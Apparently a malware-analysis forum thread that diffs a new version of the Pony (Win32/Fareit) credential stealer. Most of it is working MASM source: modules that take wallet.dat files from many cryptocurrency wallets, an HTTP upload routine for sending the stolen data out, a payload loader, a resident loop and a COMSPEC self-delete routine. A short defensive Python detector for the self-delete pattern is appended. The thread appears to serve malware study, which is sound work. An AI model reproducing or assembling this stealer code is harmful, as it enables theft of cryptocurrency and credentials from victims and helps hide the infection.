; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; MinCoin
; http://www.min-coin.org/
; Tested: v0.6.5.0-g498f5d1-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_MINCOIN

.data
   CMincoinWalletFile               db   'wallet.dat',0
   CMincoinAppDataDir               db   '\Mincoin',0

.code

GrabMincoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_MINCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CMincoinAppDataDir, offset CMincoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabMincoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; GoldCoin
; http://gldcoin.com/
; Tested: v0.7.1.6-gcf3abdf39d-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_GOLDCOIN

.data
   CGoldcoinWalletFile               db   'wallet.dat',0
   CGoldcoinAppDataDir               db   '\GoldCoin (GLD)',0

.code

GrabGoldcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_GOLDCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CGoldcoinAppDataDir, offset CGoldcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabGoldcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; YaCoin
; http://www.yacoin.org/
; Tested: v0.4.0.0-g2nd-yac-wm-alpha
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_YACOIN

.data
   CYacoinWalletFile               db   'wallet.dat',0
   CYacoinAppDataDir               db   '\Yacoin',0

.code

GrabYacoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_YACOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CYacoinAppDataDir, offset CYacoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabYacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Zetacoin
; http://www.zeta-coin.org/
; Tested: v0.8.99.0-unk-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_ZETACOIN

.data
   CZetacoinWalletFile               db   'wallet.dat',0
   CZetacoinAppDataDir               db   '\Zetacoin',0

.code

GrabZetacoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_ZETACOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CZetacoinAppDataDir, offset CZetacoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabZetacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; FastCoin
; http://www.fastcoin.ca/
; Tested: v0.6.3.0-gc4135e8-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_FASTCOIN

.data
   CFastcoinWalletFile               db   'wallet.dat',0
   CFastcoinAppDataDir               db   '\Fastcoin',0

.code

GrabFastcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FASTCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CFastcoinAppDataDir, offset CFastcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFastcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; i0coin
; http://i0coin.bitparking.com/
; Tested: 0.3.25.9-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_I0COIN

.data
   CI0coinWalletFile               db   'wallet.dat',0
   CI0coinAppDataDir               db   '\I0coin',0

.code

GrabI0coin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_I0COIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CI0coinAppDataDir, offset CI0coinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabI0coin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Tagcoin
; http://tagcoin.org/
; Tested: v1.0.2
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_TAGCOIN

.data
   CTagcoinWalletFile               db   'wallet.dat',0
   CTagcoinAppDataDir               db   '\Tagcoin',0

.code

GrabTagcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_TAGCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CTagcoinAppDataDir, offset CTagcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabTagcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bytecoin
; http://www.bytecoin.biz/
; Tested: v0.8.1.1-gfdc7831-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_BYTECOIN

.data
   CBytecoinWalletFile               db   'wallet.dat',0
   CBytecoinAppDataDir               db   '\Bytecoin',0

.code

GrabBytecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_BYTECOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CBytecoinAppDataDir, offset CBytecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabBytecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Florincoin
; http://www.florincoin.org
; Tested: v0.6.5.8-unk-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_FLORINCOIN

.data
   CFlorincoinWalletFile               db   'wallet.dat',0
   CFlorincoinAppDataDir               db   '\Florincoin',0

.code

GrabFlorincoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FLORINCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CFlorincoinAppDataDir, offset CFlorincoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFlorincoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Phoenixcoin
; http://phoenixcoin.org/
; Tested: v0.6.5.0
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_PHOENIXCOIN

.data
   CPhoenixcoinWalletFile               db   'wallet.dat',0
   CPhoenixcoinAppDataDir               db   '\Phoenixcoin',0

.code

GrabPhoenixcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_PHOENIXCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CPhoenixcoinAppDataDir, offset CPhoenixcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabPhoenixcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Luckycoin
; https://cryptocointalk.com/forum/188-luckycoin-lky/
; Tested: v0.9.9.0
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_LUCKYCOIN

.data
   CLuckycoinWalletFile               db   'wallet.dat',0
   CLuckycoinAppDataDir               db   '\Luckycoin',0

.code

GrabLuckycoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_LUCKYCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CLuckycoinAppDataDir, offset CLuckycoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabLuckycoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; CraftCoin
; http://craftcoin.net
; Tested: v1.1.1.2-unk-crc
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_CRAFTCOIN

.data
   CCraftcoinWalletFile               db   'wallet.dat',0
   CCraftcoinAppDataDir               db   '\Craftcoin',0

.code

GrabCraftcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_CRAFTCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CCraftcoinAppDataDir, offset CCraftcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabCraftcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; JunkCoin
; http://jkcoin.com/
; Tested: v0.6.3.0-unk-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_JUNKCOIN

.data
   CJunkcoinWalletFile               db   'wallet.dat',0
   CJunkcoinAppDataDir               db   '\Junkcoin',0

.code

GrabJunkcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_JUNKCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CJunkcoinAppDataDir, offset CJunkcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabJunkcoin endp

ENDIF

Line 13229 (code addition):
               AddModule COMPILE_MODULE_FASTTRACK, GrabFastTrack
               AddModule COMPILE_MODULE_BITCOIN, GrabBitcoin
               AddModule COMPILE_MODULE_ELECTRUM, GrabElectrum
               AddModule COMPILE_MODULE_MULTIBIT, GrabMultiBit
               AddModule COMPILE_MODULE_FTPDISK, GrabFTPDisk
               AddModule COMPILE_MODULE_LITECOIN, GrabLitecoin
               AddModule COMPILE_MODULE_NAMECOIN, GrabNamecoin
               AddModule COMPILE_MODULE_TERRACOIN, GrabTerracoin
               AddModule COMPILE_MODULE_BITCOINARMORY, GrabBitcoinArmory
               AddModule COMPILE_MODULE_PPCOIN, GrabPPCoin
               AddModule COMPILE_MODULE_PRIMECOIN, GrabPrimecoin
               AddModule COMPILE_MODULE_FEATHERCOIN, GrabFeathercoin
               AddModule COMPILE_MODULE_NOVACOIN, GrabNovaCoin
               AddModule COMPILE_MODULE_FREICOIN, GrabFreicoin
               AddModule COMPILE_MODULE_DEVCOIN, GrabDevcoin
               AddModule COMPILE_MODULE_FRANKOCOIN, GrabFrankocoin
               AddModule COMPILE_MODULE_PROTOSHARES, GrabProtoShares
               AddModule COMPILE_MODULE_MEGACOIN, GrabMegacoin
               AddModule COMPILE_MODULE_QUARKCOIN, GrabQuarkcoin
               AddModule COMPILE_MODULE_WORLDCOIN, GrabWorldcoin
               AddModule COMPILE_MODULE_INFINITECOIN, GrabInfinitecoin
               AddModule COMPILE_MODULE_IXCOIN, GrabIxcoin
               AddModule COMPILE_MODULE_ANONCOIN, GrabAnoncoin
               AddModule COMPILE_MODULE_BBQCOIN, GrabBBQcoin
               AddModule COMPILE_MODULE_DIGITALCOIN, GrabDigitalcoin
               AddModule COMPILE_MODULE_MINCOIN, GrabMincoin
               AddModule COMPILE_MODULE_GOLDCOIN, GrabGoldcoin
               AddModule COMPILE_MODULE_YACOIN, GrabYacoin
               AddModule COMPILE_MODULE_ZETACOIN, GrabZetacoin
               AddModule COMPILE_MODULE_FASTCOIN, GrabFastcoin
               AddModule COMPILE_MODULE_I0COIN, GrabI0coin
               AddModule COMPILE_MODULE_TAGCOIN, GrabTagcoin
               AddModule COMPILE_MODULE_BYTECOIN, GrabBytecoin
               AddModule COMPILE_MODULE_FLORINCOIN, GrabFlorincoin
               AddModule COMPILE_MODULE_PHOENIXCOIN, GrabPhoenixcoin
               AddModule COMPILE_MODULE_LUCKYCOIN, GrabLuckycoin
               AddModule COMPILE_MODULE_CRAFTCOIN, GrabCraftcoin
               AddModule COMPILE_MODULE_JUNKCOIN, GrabJunkcoin
               
Line 13273 (comment added):
; Collect passwords for all enabled modules
Netcode.asm:
Code: Select all
Line 126 (code remove):
char, timeout <- removed 'timeout'

Line 214 (code edition):
CDefaultUserAgent db "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)",0

Line 220 (code addition):
db   "Accept-Language: en-US",13,10

Line 225 (code edition):
db   "User-Agent: %s",13,10,13,10,0

Line 267 (code edition):
invoke   MemAlloc, 15000 -> invoke   MemAlloc, 32000

Line 274 (code edition):
invoke  NetRecvUntilChar, s, stream, 64000, 0ah, 30 -> invoke  NetRecvUntilChar, s, stream, 64000, 0ah

Line 390 (code edition/deletion):
.data -> .code

Line 392 (comment addition):
; do not move this block to .data, - MS FIX

Line 396 (code addition):
db   "Accept-Language: en-US",13,10

Line 400 (code edition):
db   "User-Agent: %s",13,10,13,10,0

Line 409 (code addition):
   LOCAL   pUserAgent: DWORD
   LOCAL   cbUserAgent: DWORD

Line 422 (code addition):
    invoke   MemAlloc, 8192
    mov   pUserAgent, eax
    mov   cbUserAgent, 8192

Line 458 (instruction added):
cld

Line 477 (code edition/addition):
   invoke   ObtainUserAgentString, 0, pUserAgent, addr cbUserAgent
   test   eax, eax
   .IF   SUCCEEDED
      invoke   wsprintf, pFmt, offset szHTTPHdrFmt, pURL, pHost, pUserAgent
   .ELSE
      invoke   wsprintf, pFmt, offset szHTTPHdrFmt, pURL, pHost, offset CDefaultUserAgent
   .ENDIF

Line 511 (code addition):
   invoke   MemFree, pUserAgent
   
Line 541 (code edition):
mov   l.l_linger, 30 -> mov l.l_linger, 45

Line 546 (procedure modification):
MyUploadWithRedir proc uses edi ebx szLink, lpData, dwLen, lpOutStream, lpszRedir
    LOCAL   uc: URL_COMPONENTS   
    LOCAL   pHost: DWORD
    LOCAL   pFmt: DWORD
    LOCAL   pURL: DWORD
    LOCAL   s: DWORD
    LOCAL   len: DWORD
    LOCAL   pUserAgent: DWORD
    LOCAL   cbUserAgent: DWORD

    xor   ebx, ebx
    invoke   MemAlloc, 4096
    mov   pHost, eax

    invoke   MemAlloc, 4096
    mov   pURL, eax

    invoke   MemAlloc, 4096
    mov   pFmt, eax

    invoke   MemAlloc, 4096
    mov   pUserAgent, eax

    mov   cbUserAgent, 4096

    lea   edi, uc
    mov   ecx, sizeof URL_COMPONENTS
    xor   eax, eax
    rep stosb

    mov     uc.dwStructSize, sizeof URL_COMPONENTS

    push   pHost
    pop   uc.lpszHostName

    push   pURL
    pop   uc.lpszUrlPath

    mov     uc.dwHostNameLength, 4095
    mov   uc.dwUrlPathLength, 4095

    invoke  InternetCrackUrl, szLink, 0, ICU_ESCAPE, addr uc
    .IF   (!eax) || (uc.lpszHostName == NULL)
        jmp     @md_ret
      
Line 621 (code edition/addition):
   invoke   ObtainUserAgentString, 0, pUserAgent, addr cbUserAgent
   test   eax, eax
   .IF   SUCCEEDED
      invoke   wsprintf, pFmt, offset szHTTPSendFmt, pURL, pHost, dwLen, pUserAgent
   .ELSE
      invoke   wsprintf, pFmt, offset szHTTPSendFmt, pURL, pHost, dwLen, offset CDefaultUserAgent
   .ENDIF

Line 658 (code edition):
invoke   NetWorks, s, lpOutStream, addr lpszRedir -> invoke   NetWorks, s, lpOutStream, lpszRedir

Line 669 (code addition):
invoke   MemFree, pUserAgent

Line 671 (code addition):
   mov   eax, ebx
   ret
MyUploadWithRedir endp

MyUpload proc szLink, lpData, dwLen, lpOutStream
   LOCAL   lpszRedir: DWORD

   mov   eax, lpOutStream
   .IF   eax
      mov   dword ptr[eax], 0
   .ENDIF

   mov   lpszRedir, NULL
   invoke   MyUploadWithRedir, szLink, lpData, dwLen, lpOutStream, addr lpszRedir

Line 686 (code addition):
      invoke   MyUploadWithRedir, lpszRedir, lpData, dwLen, lpOutStream, NULL
      push   eax
      
Line 689 (code addition):
pop   eax

Line 690 (code deletion):
mov   eax, ebx
Xylitol
Global Moderator
Posts: 1637
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 500

Re: Win32/Fareit

Postby Xylitol » Fri Jun 27, 2014 2:16 pm

Pony.asm:
Code: Select all
Line 35 (code addition):
includelib DLL_Loader.lib

Line 57 (code edition):
push   ebp      -> xor      edx, eax
mov      ebp, esp -> xor      eax, edx
pop      ebp      -> xor      edx, eax
   
Line 63 (code addition):
nop

Line 65 (code addition):
nop

Line 67 (code addition):
nop

Line 70 (code edition):
db   0ffh -> db   0feh

Line 75 (code deletion):
Removed the IFDEF USE_UPX

Line 80 (code addition):
IFNDEF DISABLE_GRABBER

Line 84 (code addition):
include Loader.asm

Line 110 (code addition):
nop

Line 118 (code addition):
nop

Line 119 (code edition):
push   19131011 -> push   19131012

Line 129 (code addition):
nop

Line 135 (code addition):
nop

Line 164 (code addition):
IFNDEF DISABLE_GRABBER

Line 451 (code addition):
ENDIF

Line 451 (code addition):
IFDEF ENABLE_LOADER -> IFDEF SELF_DELETE

Line 456 (code addition/deletion):
Deleted szNumToStrExeFmt/szMD5HashStr/szLoaderValueDupeCheck
Added:
   szBatchFmt            db      '%d.bat',0
   szSelfDelQuoteFmt       db      '      "%s"   ',0
   szShellExecute         db      'ShellExecuteA',0
   szBatchFile             db      13,10,9,9,13,10,13,10,09,"   :ktk   ",13,10,13,10,13,10,"     del    ",9," %1  ",13,10,9,"if  ",9,9," exist ",9,"   %1  ",9,"  goto ",9,13," ktk",13,10," del ",9,"  %0 ",0
   szShell32Lib         db      'shell32.dll',0
   szComSpec            db      'COMSPEC', 0
   szSelfCommand         db      '%s /c del "%s" > NUL',0
   
Line 466 (code deletion/edition):
RunLoader procedure removed/replaced by:
; Self delete using comspec
SelfDeleteComSpec proc uses ebx
   LOCAL   lpSelfFileName: DWORD
   LOCAL   lpComSpec: DWORD
   LOCAL   lpCommandBuffer: DWORD
   LOCAL   _si: STARTUPINFO
   LOCAL   _pi: PROCESS_INFORMATION
   
Line 474 (code deletion/edition):
AntiDisasmTrick replaced by:
   invoke   MemAlloc, MAX_PATH+1
   mov   lpSelfFileName, eax
   
Line 477 (code deletion/edition):
mov   edi, offset szLoaderList removed by:
   invoke   MemAlloc, MAX_PATH+1
   mov   lpComSpec, eax
   
Line 480 (code deletion/edition):
IFDEF   LOADER_EXECUTE_NEW_FILES_ONLY replaced by:
   invoke   MemAlloc, MAX_PATH+1
   mov   lpCommandBuffer, eax
   
Line 466 (huge code addition/deletion):
; Self delete using comspec
SelfDeleteComSpec proc uses ebx
   LOCAL   lpSelfFileName: DWORD
   LOCAL   lpComSpec: DWORD
   LOCAL   lpCommandBuffer: DWORD
   LOCAL   _si: STARTUPINFO
   LOCAL   _pi: PROCESS_INFORMATION

   invoke   MemAlloc, MAX_PATH+1
   mov   lpSelfFileName, eax

   invoke   MemAlloc, MAX_PATH+1
   mov   lpComSpec, eax

   invoke   MemAlloc, MAX_PATH+1
   mov   lpCommandBuffer, eax

   invoke   GetModuleFileName, NULL, lpSelfFileName, MAX_PATH

   invoke   GetShortPathName, lpSelfFileName, lpSelfFileName, MAX_PATH

   invoke   ZeroMemory, addr _si, sizeof _si
   invoke   ZeroMemory, addr _pi, sizeof _pi

   mov   _si.cb, sizeof _si
   mov   _si.dwFlags, STARTF_USESHOWWINDOW
   mov   _si.wShowWindow, SW_HIDE
      
   invoke   GetEnvironmentVariable, addr szComSpec, lpComSpec, MAX_PATH
   .IF   eax
      invoke   wsprintf, lpCommandBuffer, addr szSelfCommand, lpComSpec, lpSelfFileName
      invoke   CreateProcess, NULL, lpCommandBuffer, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, addr _si, addr _pi
      .IF   eax
         invoke   GetCurrentProcess
         invoke   SetPriorityClass, eax, HIGH_PRIORITY_CLASS
         invoke   SetFileAttributes, lpSelfFileName, FILE_ATTRIBUTE_NORMAL
         invoke   SetPriorityClass, _pi.hProcess, IDLE_PRIORITY_CLASS
         invoke   ResumeThread, _pi.hThread
         inc   ebx
      .ENDIF
   .ENDIF

   invoke   MemFree, lpSelfFileName
   invoke   MemFree, lpComSpec
   invoke   MemFree, lpCommandBuffer

   mov   eax, ebx
      
   ret
SelfDeleteComSpec  endp
   
Line 526 (code addition):
   invoke   SelfDeleteComSpec
   .IF   eax
      ret
   .ENDIF
   
Line 740 (code addition):
IFNDEF DISABLE_GRABBER
   
Line 872 (code addition):
ENDIF

Line 874 (code edition):
InitApp proc -> InitApp proc lpUserToken
   
Line 887 (code edition):
invoke   ImpersonateLocalSystemUser -> invoke   ImpersonateLocalSystemUser, lpUserToken

Line 893 (comment addition):
; Get impersonated username to ignore it in brute-force procedure

Line 905 (code edition/deletion):
   IFNDEF DISABLE_GRABBER
      IFDEF ENCRYPT_REPORT
         invoke   DecodeReportPassword, offset CReportPassword
      ENDIF

Line 911 (code addition):
invoke   Randomize

Line 921 (code edition):
mov   eax, EXCEPTION_CONTINUE_SEARCH -> mov eax, EXCEPTION_CONTINUE_SEARCH

Line 926 (code addition):
   LOCAL   lpUserToken: DWORD
   LOCAL   isFirstCycleRun: DWORD
   
Line 936 (code addition/deletion):
invoke   InitApp replaced by:
   mov   lpUserToken, NULL ; impersonated user token
   invoke   InitApp, addr lpUserToken

   IFDEF   ENABLE_RESIDENT_MODE
      invoke   CopyRunFromAutoDirectory
   ENDIF

Line 945 (code addition):
invoke   DecipherList, offset CWordList

Line 948 (deletion/edition):
invoke   ScanAndSend replaced by:
   IFNDEF DISABLE_GRABBER
      invoke   ScanAndSend
   ELSE
      invoke   MyDownloadInit
   ENDIF

Line 954 (comment edition):
; Run loader (it will attempt to download and execute files with current logged on account privileges
; when run from Windows Service [LocalSystem user], which has limited (tricked) access to HKCU path and %APPDATA%)

Line 957 (code edition):
invoke   RunLoader -> invoke   RunLoader, lpUserToken

Line 960 (Procedure addition):
   ENDIF

   ; Resident looped cycle
   mov   isFirstCycleRun, TRUE ; do not send passwords for the first cycle
   IFDEF   ENABLE_RESIDENT_MODE
      .WHILE   TRUE
         IFDEF PERIODIC_PASSWORD_SCAN
         IFNDEF   DISABLE_GRABBER
            invoke   NeedsPasswordGrabbing
            .IF   eax && !isFirstCycleRun
               ; Scan and send passwords
               invoke   ScanAndSend
            .ENDIF
         ENDIF
         ENDIF

         invoke   Sleep, RESIDENT_LOADER_TIMEOUT*60*1000

         IFDEF   ENABLE_LOADER
            invoke   RunLoader, lpUserToken
         ENDIF

         mov   isFirstCycleRun, FALSE
      .ENDW

Line 993 (code edition):
IFNDEF DISABLE_GRABBER

Line 996 (code edition):
ENDIF

Line 998 (comment addition):
; Self delete executable (works also for DLL mode - in this case parent executable will get deleted)

Line 1023 (code deletion):
After AntiDisasmTrick this part disappeared:
   .WHILE   TRUE
      invoke   GetTickCount
      mov   ecx, 10
      xor   edx, edx
      div   ecx
      .IF   edx == 5
         .BREAK
      .ENDIF
   .ENDW

Crypto.asm (no modification)
WordList.asm (no modification)
3DES stuff (no modification)
Utils.asm (code addition for the loader and some code bug-fix)
Loader.asm (new file, wasn't in 1.9, but not really new content: they separated a part of Pony.asm and moved it to Loader.asm, to make it clearer I think, and added some code)

As mentioned by the advert, there are some huge modifications in the Opera/Chrome/Firefox procedures and the HTTP request handling; they also added support for WS_FTP Pro 12.4 and Far Manager v3.0 build 3525, but in reality they haven't changed the code, the new versions are just 'compatible'.
For CuteFTP 9/FTP Voyager 16.1/Total Commander etc., they just added some strings to make it compatible with the new versions.
Nothing fancy about the wallet stealer code, as wacked2 said, but it's honorable that they improved the code, especially in asm.
Any idea who did this work?
Xylitol
Global Moderator
Posts: 1637
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 500
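A defender-side check for the COMSPEC self-delete routine quoted in the post above, added here as an example (it is not code from the post or from Pony): it flags process-creation events where cmd.exe is launched only to delete the image of the process that spawned it, allowing for the 8.3 short path that GetShortPathName produces. The event field names and the sample events are assumed and constructed.

```python
import re
from dataclasses import dataclass

# Built from the szSelfCommand format string shown in the post:
# '%s /c del "%s" > NUL'  ->  <COMSPEC> /c del "<own 8.3 path>" > NUL
SELF_DEL_RE = re.compile(
    r'^"?(?P<shell>[^"\s]+)"?\s+/c\s+del\s+"(?P<target>[^"]+)"\s*>\s*NUL\s*$',
    re.IGNORECASE)

@dataclass
class ProcEvent:  # minimal Sysmon-style process-creation record (field names assumed)
    image: str          # path of the new process
    command_line: str
    parent_image: str   # path of the process that spawned it

def _component_matches(short: str, full: str) -> bool:
    # Approximate 8.3 test: 'LOCALS~1' vs 'Local Settings' (GetShortPathName output)
    if short.lower() == full.lower():
        return True
    if "~" not in short:
        return False
    sname, _, sext = short.upper().partition(".")
    full_u = full.upper().replace(" ", "")
    fname, _, fext = full_u.rpartition(".") if "." in full_u else (full_u, "", "")
    return fname.replace(".", "").startswith(sname.split("~")[0]) and fext[:3] == sext

def same_path(short_path: str, full_path: str) -> bool:
    a, b = short_path.split("\\"), full_path.split("\\")
    return len(a) == len(b) and all(_component_matches(x, y) for x, y in zip(a, b))

def is_self_delete(ev: ProcEvent) -> bool:
    # cmd.exe spawned only to delete the image of the process that launched it
    m = SELF_DEL_RE.match(ev.command_line)
    if not m or not ev.image.lower().endswith("cmd.exe"):
        return False
    return same_path(m.group("target"), ev.parent_image)

def find_self_deletes(events):
    return [ev.parent_image for ev in events if is_self_delete(ev)]

# Constructed sample events, not real telemetry
SAMPLE_EVENTS = [
    ProcEvent(r"C:\WINDOWS\system32\cmd.exe",
              r'C:\WINDOWS\system32\cmd.exe /c del "C:\DOCUME~1\user\LOCALS~1\Temp\PONY_S~1.EXE" > NUL',
              r"C:\Documents and Settings\user\Local Settings\Temp\pony_sample.exe"),
    ProcEvent(r"C:\WINDOWS\system32\cmd.exe",
              r'cmd.exe /c del "C:\build\old.obj" > NUL',
              r"C:\Program Files\MSBuild\MSBuild.exe"),
]
```

Because the batch runs under a low-priority child of the dying process, the parent image is usually gone by the time an analyst looks, so the parent path from the event record is the artefact to keep.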

Re: Win32/Fareit

Postby grum » Fri Jun 27, 2014 4:29 pm

Image
Image

++ loader real working?

<Pony>jup memory loading does work indeed, but server side is not implemented, fake only. :D
<Pony>it's missing everything except initial interface code :roll:
grum
Posts: 38
Joined: Tue Nov 06, 2012 12:16 pm
Reputation point: -9
